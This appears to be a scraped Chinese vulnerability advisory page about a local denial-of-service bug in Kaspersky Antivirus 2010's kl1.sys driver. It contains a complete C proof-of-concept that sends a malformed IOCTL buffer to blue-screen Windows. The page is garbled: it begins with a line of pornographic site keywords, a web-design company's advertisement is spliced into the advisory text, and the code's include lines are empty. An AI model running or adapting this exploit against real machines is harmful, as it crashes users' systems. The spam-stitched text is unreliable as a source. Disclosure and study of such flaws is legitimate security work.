日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

影響版本: Kaspersky Labs Kaspersky Antivirus 2010 9.0.0.463

公司主營(yíng)業(yè)務(wù)：做網(wǎng)站、成都網(wǎng)站建設(shè)、移動(dòng)網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳，提高企業(yè)的競(jìng)爭(zhēng)能力。創(chuàng)新互聯(lián)是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化，感謝他們對(duì)我們的高要求，感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn)，讓我們激情的團(tuán)隊(duì)有機(jī)會(huì)用頭腦與智慧不斷的給客戶帶來驚喜。創(chuàng)新互聯(lián)推出阜新免費(fèi)做網(wǎng)站回饋大家。

漏洞描述: BUGTRAQ  ID: 37044

Kaspersky Antivirus是非常流行的殺毒軟件。

Kaspersky殺毒軟件所使用的kl1.sys驅(qū)動(dòng)沒有檢查IOCTL的輸入地址，如果用戶修改了一個(gè)或兩個(gè)DWORD就可以觸發(fā)異常，導(dǎo)致系統(tǒng)藍(lán)屏死機(jī)。

<*參考  Heurs （heurs@ghostsinthstack.org） *>
測(cè)試方法:

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!

#include

#include

#include

#include

#include

int __cdecl main(int argc, char* argv[]) 
{ 
    HANDLE hDevice = (HANDLE) 0xffffffff; 
    DWORD NombreByte; 
    DWORD Crashing[] = { 
         0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a, 
         0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961, 
         0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9, 
         0xb5ebadc5 
        }; 
    BYTE Out[0x20]; 
     
    printf("Local DoS - Kaspersky 2010 9.0.0.463\n\n"); 
    hDevice = CreateFile("\\\\.\\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL); 
     
    DeviceIoControl(hDevice,0x0022c008,Crashing,sizeof(Crashing),Out,sizeof(Out),&NombreByte,NULL); 
     
    printf("Sploit Send.\nhDevice = %x\n", hDevice); 
    CloseHandle(hDevice); 
    getch(); 
    return 0; 
} 

SEBUG安全建議:

廠商補(bǔ)?。?/p>

Kaspersky Labs

目前廠商還沒有提供補(bǔ)丁或者升級(jí)程序，我們建議使用此軟件的用戶隨時(shí)關(guān)注廠商的主頁以獲取最新版本：

http://www.kaspersky.com/

【編輯推薦】

1. Cisco IOS MSFC2 畸形二層幀遠(yuǎn)程拒絕服務(wù)安全缺陷
2. Sun OpenSolaris內(nèi)核Panic遠(yuǎn)程拒絕服務(wù)漏洞
3. 谷歌發(fā)布Android安全漏洞補(bǔ)丁修復(fù)兩個(gè)DoS漏洞